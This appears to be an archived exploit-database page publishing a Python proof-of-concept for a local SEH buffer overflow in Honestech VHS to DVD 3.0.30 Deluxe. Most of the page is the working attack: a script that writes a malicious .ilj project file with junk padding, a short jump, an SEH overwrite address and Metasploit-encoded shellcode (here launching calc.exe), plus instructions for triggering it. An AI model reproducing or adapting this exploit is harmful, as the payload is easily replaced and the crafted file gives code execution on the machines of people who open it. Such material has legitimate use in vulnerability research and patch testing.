Home / os / win7

Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overfl

Posted on 16 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Honestech VHS to DVD &lt;= 3.0.30 Deluxe Local Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================
Honestech VHS to DVD &lt;= 3.0.30 Deluxe Local Buffer Overflow (SEH)
=================================================================

#!/usr/bin/python
#
# Exploit Title: Honestech VHS to DVD &lt;= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Date: September 16, 2010
# Author: Brennon Thomas thomab310@gmail.com
# Software Link: n/a
# Version: &lt;= 3.0.30.0 Deluxe
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
#
# Usage: This python script generates the malicious .ilj project file.
# Open Honestech VHS to DVD &lt;= 3.0.30 Deluxe in Advanced mode and
# load the corrupt file.
#
# Exploit is for education purposes only.  Author takes no responsibility
# for what you do with it.
 
#Required file text
buf = &quot;



&lt;CAPTURE&gt;



[MAINDLG]

PAGE=0



[AVICODEC]

VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)

AUDIOCODEC=MPEG Layer-3



[WMVINFO]

TITLE=  

AUTHOR=  

COPYRIGHT=  

DESCRIPTION=  



[CAPTUREINFO]

OUTPUTFOLDER=E:\misc\

STATE=0,1,1,0,4396,4,1,0,0



[BURNINFO]

STATE=0,0,0,0,0,0

TEMPFOLDER=E:\misc\

VIDEOTSFOLDER=E:\misc\

IMAGEFOLDER=E:\misc\



[FILELIST]

FILE=E:\&quot;
 
buf += &quot;x90&quot;*257         #Junk
buf += &quot;xebx08x90x90&quot; #JMP SHORT 8, NOP Padding
buf += &quot;xbax25x31x58&quot; #SEH Overwrite to POP,POP,RETN in msg723.acm
buf += &quot;x90&quot;*16          #NOP Buffer
 
#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b 'x00x0ax0dx2c' -t c
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
buf += (&quot;xbexf9x89xfaxaaxdbxcaxd9x74x24xf4x33xc9xb1x33&quot;
&quot;x5dx31x75x13x83xedxfcx03x75xf6x6bx0fx56xe0xe5&quot;
&quot;xf0xa7xf0x95x79x42xc1x87x1ex06x73x18x54x4ax7f&quot;
&quot;xd3x38x7fxf4x91x94x70xbdx1cxc3xbfx3ex91xcbx6c&quot;
&quot;xfcxb3xb7x6exd0x13x89xa0x25x55xcexddxc5x07x87&quot;
&quot;xaax77xb8xacxefx4bxb9x62x64xf3xc1x07xbbx87x7b&quot;
&quot;x09xecx37xf7x41x14x3cx5fx72x25x91x83x4ex6cx9e&quot;
&quot;x70x24x6fx76x49xc5x41xb6x06xf8x6dx3bx56x3cx49&quot;
&quot;xa3x2dx36xa9x5ex36x8dxd3x84xb3x10x73x4fx63xf1&quot;
&quot;x85x9cxf2x72x89x69x70xdcx8ex6cx55x56xaaxe5x58&quot;
&quot;xb9x3axbdx7ex1dx66x66x1ex04xc2xc9x1fx56xaaxb6&quot;
&quot;x85x1cx59xa3xbcx7ex34x32x4cx05x71x34x4ex06xd2&quot;
&quot;x5cx7fx8dxbdx1bx80x44xfaxd3xcaxc5xabx7bx93x9f&quot;
&quot;xe9xe6x24x4ax2dx1exa7x7fxcexe5xb7xf5xcbxa2x7f&quot;
&quot;xe5xa1xbbx15x09x15xbcx3fx6axf8x2exa3x43x9fxd6&quot;
&quot;x46x9cx55&quot;)
 
buf += &quot;x90&quot;*(6000-(len(buf))) #NOP Buffer
buf += &quot;,0,7462,885953024,4,1,640,480
&quot; #Required file text
 
f = open(&quot;sploit.ilj&quot;, &quot;w&quot;)
f.write(buf)
f.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :